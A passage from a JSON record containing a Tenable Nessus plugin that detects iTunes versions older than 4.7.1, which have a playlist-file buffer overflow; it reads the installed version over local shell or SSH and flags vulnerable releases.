value:\n\"The remote host is missing a Mac OS X update that fixes a security\nissue.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The remote host is running a version of iTunes which is older than\nversion 4.7.1. The remote version of this software is vulnerable\nto a buffer overflow when it parses a malformed playlist file\n(.m3u or .pls files). A remote attacker could exploit this by\ntricking a user into opening a maliciously crafted file, resulting\nin arbitrary code execution.\" );\n # https://lists.apple.com/archives/security-announce/2005/Jan/msg00000.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eba3be11\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2005/Jan/119\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to iTunes 4.7.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple ITunes 4.7 Playlist Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\ncmd = GetBundleVersionCmd(file:\"iTunes.app\", path:\"/Applications\");\n\nif ( islocalhost() )\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\nelse\n{\n ret = ssh_open_connection();\n if ( ! ret ) exit(0);\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n}\n\nif ( ! buf ) exit(0);\nif ( ! ereg(pattern:\"^iTunes [0-9.]\", string:buf) ) exit(0);\nversion = ereg_replace(pattern:\"^iTunes ([0-9.]+),.*\", string:buf, replace:\"\\1\");\nset_kb_item(name:\"iTunes/Version\", value:version);\nif ( egrep(pattern:\"iTunes 4\\.([0-6]\\..*|7|7\\.0)$\", string:buf) ) security_warning(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
